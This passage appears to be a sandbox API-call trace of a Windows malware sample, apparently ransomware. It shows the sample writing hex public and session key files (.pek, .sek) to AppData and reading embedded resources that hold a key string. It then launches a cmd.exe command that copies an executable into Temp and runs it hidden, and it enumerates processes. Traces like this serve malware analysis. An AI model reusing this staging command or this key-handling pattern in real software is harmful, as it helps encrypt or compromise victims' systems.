wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xa, wMilliseconds=0x38b)) [0097.452] GetLocalTime (in: lpSystemTime=0x12fab4 | out: lpSystemTime=0x12fab4*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xa, wMilliseconds=0x38b)) [0097.452] QueryPerformanceCounter (in: lpPerformanceCount=0x12fb34 | out: lpPerformanceCount=0x12fb34*=15424085147) returned 1 [0097.452] GetTickCount () returned 0x23448 [0097.452] GetLocalTime (in: lpSystemTime=0x12fb2c | out: lpSystemTime=0x12fb2c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xa, wMilliseconds=0x38b)) [0097.452] GetLocalTime (in: lpSystemTime=0x12fb2c | out: lpSystemTime=0x12fb2c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xa, wMilliseconds=0x38b)) [0097.452] GetCurrentThreadId () returned 0xaf0 [0097.452] GetCurrentThread () returned 0xfffffffe [0097.452] GetThreadTimes (in: hThread=0xfffffffe, lpCreationTime=0x12fb2c, lpExitTime=0x12fb34, lpKernelTime=0x12fb3c, lpUserTime=0x12fb44 | out: lpCreationTime=0x12fb2c, lpExitTime=0x12fb34, lpKernelTime=0x12fb3c, lpUserTime=0x12fb44) returned 1 [0097.452] GetCurrentProcessId () returned 0xaec [0097.452] GetCurrentProcess () returned 0xffffffff [0097.452] GetProcessTimes (in: hProcess=0xffffffff, lpCreationTime=0x12fb2c, lpExitTime=0x12fb34, lpKernelTime=0x12fb3c, lpUserTime=0x12fb44 | out: lpCreationTime=0x12fb2c, lpExitTime=0x12fb34, lpKernelTime=0x12fb3c, lpUserTime=0x12fb44) returned 1 [0097.452] GetSystemTimes (in: lpIdleTime=0x12fb2c, lpKernelTime=0x12fb34, lpUserTime=0x12fb3c | out: lpIdleTime=0x12fb2c, lpKernelTime=0x12fb34, lpUserTime=0x12fb3c) returned 1 [0106.489] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12bf79c, cbMultiByte=256, lpWideCharStr=0x12ebec, cchWideChar=2047 | out: lpWideCharStr="3188F4D96148D06248FF860F1F65D120FAB8156037429C7089812BC55632EB609550230C3006C46F6E0A78E1153BEEC8F710D6A710B0D42882A9935004B4A69BC543DAC9B57365F9C3440155E86E8B5040D058A81A1FBC595113A4BD0C4E706265772A8DBBC77DCCBE5C1C289C1E214BD4C2A1969A36593C153474D82BAA2793荠\x1c彩\x12眤") returned 256 [0106.489] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12bf79c, cbMultiByte=256, lpWideCharStr=0x12ebe8, cchWideChar=2047 | out: lpWideCharStr="3188F4D96148D06248FF860F1F65D120FAB8156037429C7089812BC55632EB609550230C3006C46F6E0A78E1153BEEC8F710D6A710B0D42882A9935004B4A69BC543DAC9B57365F9C3440155E86E8B5040D058A81A1FBC595113A4BD0C4E706265772A8DBBC77DCCBE5C1C289C1E214BD4C2A1969A36593C153474D82BAA279393荠\x1c彩\x12眤") returned 256 [0106.489] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1312d8c, cbMultiByte=8, lpWideCharStr=0x12ebe8, cchWideChar=2047 | out: lpWideCharStr="000100016148D06248FF860F1F65D120FAB8156037429C7089812BC55632EB609550230C3006C46F6E0A78E1153BEEC8F710D6A710B0D42882A9935004B4A69BC543DAC9B57365F9C3440155E86E8B5040D058A81A1FBC595113A4BD0C4E706265772A8DBBC77DCCBE5C1C289C1E214BD4C2A1969A36593C153474D82BAA279393荠\x1c彩\x12眤") returned 8 [0106.489] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\3188F4D96148D062.pek" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\3188f4d96148d062.pek"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0106.489] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="1024\r\n3188F4D96148D06248FF860F1F65D120FAB8156037429C7089812BC55632EB609550230C3006C46F6E0A78E1153BEEC8F710D6A710B0D42882A9935004B4A69BC543DAC9B57365F9C3440155E86E8B5040D058A81A1FBC595113A4BD0C4E706265772A8DBBC77DCCBE5C1C289C1E214BD4C2A1969A36593C153474D82BAA2793\r\n00010001\r\n", cchWideChar=274, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 274 [0106.489] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="1024\r\n3188F4D96148D06248FF860F1F65D120FAB8156037429C7089812BC55632EB609550230C3006C46F6E0A78E1153BEEC8F710D6A710B0D42882A9935004B4A69BC543DAC9B57365F9C3440155E86E8B5040D058A81A1FBC595113A4BD0C4E706265772A8DBBC77DCCBE5C1C289C1E214BD4C2A1969A36593C153474D82BAA2793\r\n00010001\r\n", cchWideChar=274, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 274 [0106.489] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="1024\r\n3188F4D96148D06248FF860F1F65D120FAB8156037429C7089812BC55632EB609550230C3006C46F6E0A78E1153BEEC8F710D6A710B0D42882A9935004B4A69BC543DAC9B57365F9C3440155E86E8B5040D058A81A1FBC595113A4BD0C4E706265772A8DBBC77DCCBE5C1C289C1E214BD4C2A1969A36593C153474D82BAA2793\r\n00010001\r\n", cchWideChar=274, lpMultiByteStr=0x12bf798, cbMultiByte=274, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="1024\r\n3188F4D96148D06248FF860F1F65D120FAB8156037429C7089812BC55632EB609550230C3006C46F6E0A78E1153BEEC8F710D6A710B0D42882A9935004B4A69BC543DAC9B57365F9C3440155E86E8B5040D058A81A1FBC595113A4BD0C4E706265772A8DBBC77DCCBE5C1C289C1E214BD4C2A1969A36593C153474D82BAA2793\r\n00010001\r\n", lpUsedDefaultChar=0x0) returned 274 [0106.489] WriteFile (in: hFile=0xec, lpBuffer=0x12bf798*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x12fb78, lpOverlapped=0x0 | out: lpBuffer=0x12bf798*, lpNumberOfBytesWritten=0x12fb78*=0x112, lpOverlapped=0x0) returned 1 [0106.534] CloseHandle (hObject=0xec) returned 1 [0106.534] GetCurrentThreadId () returned 0xaf0 [0106.534] GetCurrentThreadId () returned 0xaf0 [0106.534] GetCurrentThreadId () returned 0xaf0 [0106.534] FindResourceW (hModule=0x400000, lpName="KLIST", lpType=0xa) returned 0x51c3f8 [0106.534] LoadResource (hModule=0x400000, hResInfo=0x51c3f8) returned 0x516690 [0106.534] SizeofResource (hModule=0x400000, hResInfo=0x51c3f8) returned 0x192 [0106.534] LockResource (hResData=0x516690) returned 0x516690 [0106.534] FreeResource (hResData=0x516690) returned 0 [0106.534] FindResourceW (hModule=0x400000, lpName="CHAK", lpType=0xa) returned 0x51c330 [0106.534] LoadResource (hModule=0x400000, hResInfo=0x51c330) returned 0x50d64c [0106.534] SizeofResource (hModule=0x400000, hResInfo=0x51c330) returned 0x26 [0106.534] LockResource (hResData=0x50d64c) returned 0x50d64c [0106.534] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1361de0, cbMultiByte=38, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0106.534] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1361de0, cbMultiByte=38, lpWideCharStr=0x133deac, cchWideChar=38 | out: lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P\r\n42\r\n") returned 38 [0106.535] FreeResource (hResData=0x50d64c) returned 0 [0106.535] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0106.535] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x1361de4, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", lpUsedDefaultChar=0x0) returned 32 [0106.535] GetCurrentThreadId () returned 0xaf0 [0106.535] GetCurrentThreadId () returned 0xaf0 [0106.535] GetCurrentThreadId () returned 0xaf0 [0106.535] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12e35c8, cbMultiByte=402, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 402 [0106.535] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12e35c8, cbMultiByte=402, lpWideCharStr=0x12fee1c, cchWideChar=402 | out: lpWideCharStr="1536\r\n33324697D85614AAB6D98F2EE05B1BB40171424AE4C05FC1F36E602D864951456DF09B21586C47CC3F26F9E390C771449CE5F6D449FAEB04DAE0847529C0D092AC3168E5D9ED2FCEB06A25E7FA298DBF7B38E093E784F96CA556CC12A8396F4D7165CA18B9049D247C131C990F128D58446A1D6D31BA1C47F442249E6E79CAA3089A7EA8041E9CAEA18B222453372900408AA32A66C8C5BAA4D20EAB485059EC519FAF4BD37149C39CD8DD553781D95A0EDF5FC7F4B350D4EA2BC0B96A54BE1F\r\n00010001\r\n") returned 402 [0106.535] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="33324697D85614AAB6D98F2EE05B1BB40171424AE4C05FC1F36E602D864951456DF09B21586C47CC3F26F9E390C771449CE5F6D449FAEB04DAE0847529C0D092AC3168E5D9ED2FCEB06A25E7FA298DBF7B38E093E784F96CA556CC12A8396F4D7165CA18B9049D247C131C990F128D58446A1D6D31BA1C47F442249E6E79CAA3089A7EA8041E9CAEA18B222453372900408AA32A66C8C5BAA4D20EAB485059EC519FAF4BD37149C39CD8DD553781D95A0EDF5FC7F4B350D4EA2BC0B96A54BE1F", cchWideChar=384, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 384 [0106.535] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="33324697D85614AAB6D98F2EE05B1BB40171424AE4C05FC1F36E602D864951456DF09B21586C47CC3F26F9E390C771449CE5F6D449FAEB04DAE0847529C0D092AC3168E5D9ED2FCEB06A25E7FA298DBF7B38E093E784F96CA556CC12A8396F4D7165CA18B9049D247C131C990F128D58446A1D6D31BA1C47F442249E6E79CAA3089A7EA8041E9CAEA18B222453372900408AA32A66C8C5BAA4D20EAB485059EC519FAF4BD37149C39CD8DD553781D95A0EDF5FC7F4B350D4EA2BC0B96A54BE1F", cchWideChar=384, lpMultiByteStr=0x12e35cc, cbMultiByte=384, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="33324697D85614AAB6D98F2EE05B1BB40171424AE4C05FC1F36E602D864951456DF09B21586C47CC3F26F9E390C771449CE5F6D449FAEB04DAE0847529C0D092AC3168E5D9ED2FCEB06A25E7FA298DBF7B38E093E784F96CA556CC12A8396F4D7165CA18B9049D247C131C990F128D58446A1D6D31BA1C47F442249E6E79CAA3089A7EA8041E9CAEA18B222453372900408AA32A66C8C5BAA4D20EAB485059EC519FAF4BD37149C39CD8DD553781D95A0EDF5FC7F4B350D4EA2BC0B96A54BE1F", lpUsedDefaultChar=0x0) returned 384 [0106.535] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="00010001", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0106.535] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="00010001", cchWideChar=8, lpMultiByteStr=0x1312d8c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="00010001", lpUsedDefaultChar=0x0) returned 8 [0106.535] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12e35cc, cbMultiByte=384, lpWideCharStr=0x12ebec, cchWideChar=2047 | out: lpWideCharStr="33324697D85614AAB6D98F2EE05B1BB40171424AE4C05FC1F36E602D864951456DF09B21586C47CC3F26F9E390C771449CE5F6D449FAEB04DAE0847529C0D092AC3168E5D9ED2FCEB06A25E7FA298DBF7B38E093E784F96CA556CC12A8396F4D7165CA18B9049D247C131C990F128D58446A1D6D31BA1C47F442249E6E79CAA3089A7EA8041E9CAEA18B222453372900408AA32A66C8C5BAA4D20EAB485059EC519FAF4BD37149C39CD8DD553781D95A0EDF5FC7F4B350D4EA2BC0B96A54BE1Fws\\system32\\逐甬逐甬眩e") returned 384 [0106.535] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12bf79c, cbMultiByte=256, lpWideCharStr=0x12e890, cchWideChar=2047 | out: lpWideCharStr="3188F4D96148D06248FF860F1F65D120FAB8156037429C7089812BC55632EB609550230C3006C46F6E0A78E1153BEEC8F710D6A710B0D42882A9935004B4A69BC543DAC9B57365F9C3440155E86E8B5040D058A81A1FBC595113A4BD0C4E706265772A8DBBC77DCCBE5C1C289C1E214BD4C2A1969A36593C153474D82BAA2793") returned 256 [0106.535] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12e35cc, cbMultiByte=384, lpWideCharStr=0x12e890, cchWideChar=2047 | out: lpWideCharStr="33324697D85614AAB6D98F2EE05B1BB40171424AE4C05FC1F36E602D864951456DF09B21586C47CC3F26F9E390C771449CE5F6D449FAEB04DAE0847529C0D092AC3168E5D9ED2FCEB06A25E7FA298DBF7B38E093E784F96CA556CC12A8396F4D7165CA18B9049D247C131C990F128D58446A1D6D31BA1C47F442249E6E79CAA3089A7EA8041E9CAEA18B222453372900408AA32A66C8C5BAA4D20EAB485059EC519FAF4BD37149C39CD8DD553781D95A0EDF5FC7F4B350D4EA2BC0B96A54BE1F깋\x12넘@Ӥ") returned 384 [0106.535] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12bf79c, cbMultiByte=256, lpWideCharStr=0x12e8c4, cchWideChar=2047 | out: lpWideCharStr="3188F4D96148D06248FF860F1F65D120FAB8156037429C7089812BC55632EB609550230C3006C46F6E0A78E1153BEEC8F710D6A710B0D42882A9935004B4A69BC543DAC9B57365F9C3440155E86E8B5040D058A81A1FBC595113A4BD0C4E706265772A8DBBC77DCCBE5C1C289C1E214BD4C2A1969A36593C153474D82BAA2793372900408AA32A66C8C5BAA4D20EAB485059EC519FAF4BD37149C39CD8DD553781D95A0EDF5FC7F4B350D4EA2BC0B96A54BE1F깋\x12넘@Ӥ") returned 256 [0106.535] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12bf79c, cbMultiByte=256, lpWideCharStr=0x12e8c4, cchWideChar=2047 | out: lpWideCharStr="2C3BCBC20E80B22D0258C3C2DF5BD18B2CB893C60EB2B9F638A4138D2DB35CC32BB29B09781DA2EE8A8A69753DBBFE38918004DEBD25DADEAE0775D7FFCBBDF6D1B2061A0E436BB46E37E4551BDDF25C84F66AF2B519221763DA746415845B4D0BF027741BD34AABA6C557AFACF99E5968D51482E140621682BFCDB95E712FF9372900408AA32A66C8C5BAA4D20EAB485059EC519FAF4BD37149C39CD8DD553781D95A0EDF5FC7F4B350D4EA2BC0B96A54BE1F깋\x12넘@Ӥ") returned 256 [0106.535] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1312d8c, cbMultiByte=8, lpWideCharStr=0x12e8c4, cchWideChar=2047 | out: lpWideCharStr="000100010E80B22D0258C3C2DF5BD18B2CB893C60EB2B9F638A4138D2DB35CC32BB29B09781DA2EE8A8A69753DBBFE38918004DEBD25DADEAE0775D7FFCBBDF6D1B2061A0E436BB46E37E4551BDDF25C84F66AF2B519221763DA746415845B4D0BF027741BD34AABA6C557AFACF99E5968D51482E140621682BFCDB95E712FF9372900408AA32A66C8C5BAA4D20EAB485059EC519FAF4BD37149C39CD8DD553781D95A0EDF5FC7F4B350D4EA2BC0B96A54BE1F깋\x12넘@Ӥ") returned 8 [0106.535] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x128b71c, cbMultiByte=128, lpWideCharStr=0x12e8c4, cchWideChar=2047 | out: lpWideCharStr="F9B836BF6D9E9C77A51931DB6FE75A14FA6DF5B0A5D06D8C7898DB3A4ACCB49978A4DDD8544FB647ECB00C0ACD8A8D38AECB8C6A930467792DFD8559F61CE10DD1B2061A0E436BB46E37E4551BDDF25C84F66AF2B519221763DA746415845B4D0BF027741BD34AABA6C557AFACF99E5968D51482E140621682BFCDB95E712FF9372900408AA32A66C8C5BAA4D20EAB485059EC519FAF4BD37149C39CD8DD553781D95A0EDF5FC7F4B350D4EA2BC0B96A54BE1F깋\x12넘@Ӥ") returned 128 [0106.535] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x128b71c, cbMultiByte=128, lpWideCharStr=0x12e8c4, cchWideChar=2047 | out: lpWideCharStr="32C7E17D9BD34A8F9AB2FB451ED197196DDF31074C4B4080A50BF6432A981D0E3478F16FCA212B62ACE127053BBB913A1AFF1CCD0FE1A37B9B3C333DFE36C31FD1B2061A0E436BB46E37E4551BDDF25C84F66AF2B519221763DA746415845B4D0BF027741BD34AABA6C557AFACF99E5968D51482E140621682BFCDB95E712FF9372900408AA32A66C8C5BAA4D20EAB485059EC519FAF4BD37149C39CD8DD553781D95A0EDF5FC7F4B350D4EA2BC0B96A54BE1F깋\x12넘@Ӥ") returned 128 [0106.535] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12bf9dc, cbMultiByte=256, lpWideCharStr=0x12e8c4, cchWideChar=2047 | out: lpWideCharStr="3188F4D96148D06248FF860F1F65D120FAB8156037429C7089812BC55632EB609550230C3006C46F6E0A78E1153BEEC8F710D6A710B0D42882A9935004B4A69A98C3C28CAC017EF28377D43559B59A21D88331F028040E4C336ED33F96E99EBAB8595B459D569C2224CAE91892D802D90AF7F85EF7504E474BFABC4037568368372900408AA32A66C8C5BAA4D20EAB485059EC519FAF4BD37149C39CD8DD553781D95A0EDF5FC7F4B350D4EA2BC0B96A54BE1F깋\x12넘@Ӥ") returned 256 [0106.535] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x128b71c, cbMultiByte=128, lpWideCharStr=0x12e8c4, cchWideChar=2047 | out: lpWideCharStr="3556616B35D0C0FED526B27D7A4361FC451923771D938D3289B7AC6BA0FA6440BB820B585F79BF2751A8B089C62927CCC998F45EF713E3BE0052BC1EE0F07E2998C3C28CAC017EF28377D43559B59A21D88331F028040E4C336ED33F96E99EBAB8595B459D569C2224CAE91892D802D90AF7F85EF7504E474BFABC4037568368372900408AA32A66C8C5BAA4D20EAB485059EC519FAF4BD37149C39CD8DD553781D95A0EDF5FC7F4B350D4EA2BC0B96A54BE1F깋\x12넘@Ӥ") returned 128 [0106.535] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x128b71c, cbMultiByte=128, lpWideCharStr=0x12e8c4, cchWideChar=2047 | out: lpWideCharStr="2606AFC093D3A15DF0065F4ADF4D2BCD0B0DBB752F989A70BB273DFE06036A9E9C8484A7A5C138EFE76DA2FEB4403CFC3A0317DA272E5C71CF49414606FB931998C3C28CAC017EF28377D43559B59A21D88331F028040E4C336ED33F96E99EBAB8595B459D569C2224CAE91892D802D90AF7F85EF7504E474BFABC4037568368372900408AA32A66C8C5BAA4D20EAB485059EC519FAF4BD37149C39CD8DD553781D95A0EDF5FC7F4B350D4EA2BC0B96A54BE1F깋\x12넘@Ӥ") returned 128 [0106.535] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x0, lpMultiByteStr=0x1312d0c, cbMultiByte=8, lpWideCharStr=0x12e8c4, cchWideChar=2047 | out: lpWideCharStr="0000000093D3A15DF0065F4ADF4D2BCD0B0DBB752F989A70BB273DFE06036A9E9C8484A7A5C138EFE76DA2FEB4403CFC3A0317DA272E5C71CF49414606FB931998C3C28CAC017EF28377D43559B59A21D88331F028040E4C336ED33F96E99EBAB8595B459D569C2224CAE91892D802D90AF7F85EF7504E474BFABC4037568368372900408AA32A66C8C5BAA4D20EAB485059EC519FAF4BD37149C39CD8DD553781D95A0EDF5FC7F4B350D4EA2BC0B96A54BE1F깋\x12넘@Ӥ") returned 8 [0106.611] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\3188F4D96148D062.sek" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\3188f4d96148d062.sek"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0106.667] WriteFile (in: hFile=0xec, lpBuffer=0x12fedf0*, nNumberOfBytesToWrite=0x3dc, lpNumberOfBytesWritten=0x12f7f0, lpOverlapped=0x0 | out: lpBuffer=0x12fedf0*, lpNumberOfBytesWritten=0x12f7f0*=0x3dc, lpOverlapped=0x0) returned 1 [0106.668] CloseHandle (hObject=0xec) returned 1 [0106.669] GetTickCount () returned 0x2584c [0106.669] QueryPerformanceCounter (in: lpPerformanceCount=0x12fc10 | out: lpPerformanceCount=0x12fc10*=16345819264) returned 1 [0106.669] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbec, cbMultiByte=1, lpWideCharStr=0x12ebd4, cchWideChar=2047 | out: lpWideCharStr="W") returned 1 [0106.669] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbec, cbMultiByte=1, lpWideCharStr=0x12ebd4, cchWideChar=2047 | out: lpWideCharStr="t") returned 1 [0106.669] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbec, cbMultiByte=1, lpWideCharStr=0x12ebd4, cchWideChar=2047 | out: lpWideCharStr="s") returned 1 [0106.669] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbec, cbMultiByte=1, lpWideCharStr=0x12ebd4, cchWideChar=2047 | out: lpWideCharStr="k") returned 1 [0106.669] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbec, cbMultiByte=1, lpWideCharStr=0x12ebd4, cchWideChar=2047 | out: lpWideCharStr="8") returned 1 [0106.669] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbec, cbMultiByte=1, lpWideCharStr=0x12ebd4, cchWideChar=2047 | out: lpWideCharStr="W") returned 1 [0106.669] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbec, cbMultiByte=1, lpWideCharStr=0x12ebd4, cchWideChar=2047 | out: lpWideCharStr="x") returned 1 [0106.669] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbec, cbMultiByte=1, lpWideCharStr=0x12ebd4, cchWideChar=2047 | out: lpWideCharStr="H") returned 1 [0106.669] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe", lpszShortPath=0x128b71c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe") returned 0x36 [0106.669] CharUpperBuffW (in: lpsz="type \"[FROM_PATH]\" > \"[TO_PATH]\" && \"[TO_PATH]\" [PARAMS]", cchLength=0x38 | out: lpsz="TYPE \"[FROM_PATH]\" > \"[TO_PATH]\" && \"[TO_PATH]\" [PARAMS]") returned 0x38 [0106.670] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0106.670] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\", lpszShortPath=0x128b71c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\") returned 0x24 [0106.670] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"[TO_PATH]\" && \"[TO_PATH]\" [PARAMS]", cchLength=0x63 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"[TO_PATH]\" && \"[TO_PATH]\" [PARAMS]") returned 0x63 [0106.670] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0106.670] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\Wtsk8WxH.exe\" && \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\Wtsk8WxH.exe\" [PARAMS]", cchLength=0xb1 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"C:\\USERS\\EEBSYM5\\APPDATA\\LOCAL\\TEMP\\WTSK8WXH.EXE\" && \"C:\\USERS\\EEBSYM5\\APPDATA\\LOCAL\\TEMP\\WTSK8WXH.EXE\" [PARAMS]") returned 0xb1 [0106.670] CharUpperBuffW (in: lpsz="[PARAMS]", cchLength=0x8 | out: lpsz="[PARAMS]") returned 0x8 [0106.670] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\Wtsk8WxH.exe\" && \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\Wtsk8WxH.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"LOCAL_3188F4D96148D062\" \"60000\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb2c*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb1c | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\Wtsk8WxH.exe\" && \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\Wtsk8WxH.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"LOCAL_3188F4D96148D062\" \"60000\"", lpProcessInformation=0x12fb1c*(hProcess=0xf0, hThread=0xec, dwProcessId=0xc70, dwThreadId=0xc74)) returned 1 [0106.677] CloseHandle (hObject=0xf0) returned 1 [0106.677] CloseHandle (hObject=0xec) returned 1 [0106.677] Sleep (dwMilliseconds=0xfa) [0106.931] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xf8 [0106.936] Process32FirstW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0106.937] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 